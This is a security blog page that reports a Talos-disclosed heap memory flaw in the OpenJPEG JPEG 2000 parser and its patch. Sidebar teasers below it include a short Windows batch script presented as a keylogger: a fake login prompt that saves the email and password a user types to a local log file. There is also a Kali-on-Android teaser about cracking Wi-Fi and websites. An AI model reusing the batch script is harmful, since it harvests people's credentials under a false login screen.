Skip to main content

By opening jpeg 2000 image file you can get hacked

: Security researchers at Talos have discovered zero-day vulnerability in JPEG 2000 image file format. A specially crafted JPEG 2000 file can trigger a massive read and write of adjacent heap area memory, causing a code execution possibility.

Azero-day flaw in the JPEG 2000 image file format has been discovered by the security experts at Cisco Talos group. The JPEG 2000 is often used to embed images in the PDF documents. This vulnerability affects the image file format parser implemented in OpenJPEG library. OpenJPEG is an open-source JPEG 2000 codec written in C language.

This revelation has been made in a security advisory published by Talcos. The advisory states that the flaw could allow arbitrary code execution. This flaw was first discovered by Aleksandar Nikolic of Cisco Talos.

The security researchers have successfully tested the JPEG 2000 exploit on the OpenJPEG openjp2 2.1.1.

What makes this zero-day flaw in JPEF 2000 so scary?

In order to exploit the vulnerability, a hacker needs to trick the victim into opening custom JPEG 2000 image file. This could be done by sending an email to the victim, containing a PDF file or some other methods like Google Drive or Dropbox.

Due to an error while parsing mcc records in the jpeg2000 file, the attacker can access out of the bounds memory. It could result in a massive read and write of adjacent heap area memory. On further manipulation of heap layout, a skilled hacker can head metadata process memory corruption, leading to code execution.

The security advisory states:

The vulnerability lies in opj_j2k_read_mcc_record function in src/lib/openjp2/j2k.c file which is responsible for parsing mcc records.

Talos experts have disclosed the zero-day flaw to the vendor OpenJPEG on July 26, which was followed by a patch released on September 29.

Detailed information can be found on Talos website.

Did you find this article helpful? Don’t forget to drop your feedback in the comments section below.

Comments

Post a Comment

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file w...
Post a Comment
Read more

Kali linux android simply amazing

How to Install and run Kali Linux on any Android Smartphone TUTORIAL FOR INSTALLING AND RUNNING KALI LINUX ON ANDROID SMARTPHONES AND TABLETS Kali Linux is one the best love operating system of white hat hackers, security researchers and pentesters. It offers advanced penetration testing tool and its ease of use means that it should be a part of every security professional’s toolbox. Penetration testing involves using a variety of tools and techniques to test the limits of security policies and procedures. Now a days more and more apps are available on Android operating system for smartphones and tablets so it becomes worthwhile to have  it on your smartphone as well. Kali Linux on Android smartphones and tablets allows researchers and pentesters to perform ” security checks” on things like cracking wep Wi-Fi passwords, finding vulnerabilities/bugs or cracking security on websites.  This opens the door to doing this from a mobile device such a...
Post a Comment
Read more

What is DNS

D NS stands for Domain Name System is used to as the medium to translate domain names to their respective IP addresses when a client initiates a request query. DNS stores the database of all the domain names and their IP addresses which are registered on the network. Most of us are quite familiar with the term DNS or Domain Name System. DNS can be thought of as an attendance register for various websites present over the internet. In the case of DNS, it maintains the database of all the websites Domain Names and their IP (Internet Protocol) addresses that are operational all over the world. Historical Notes The origins of DNS date back to the time of the ARPANET  when there were only a few computers to get an entry in the database. A HOSTS.TXT file was maintained by Stanford Research Institute, which constituted the data of all the machines, and was copied by all the host machines to remain updated. Jon Postel from the Information Sciences Institute requested Pau...
Post a Comment
Read more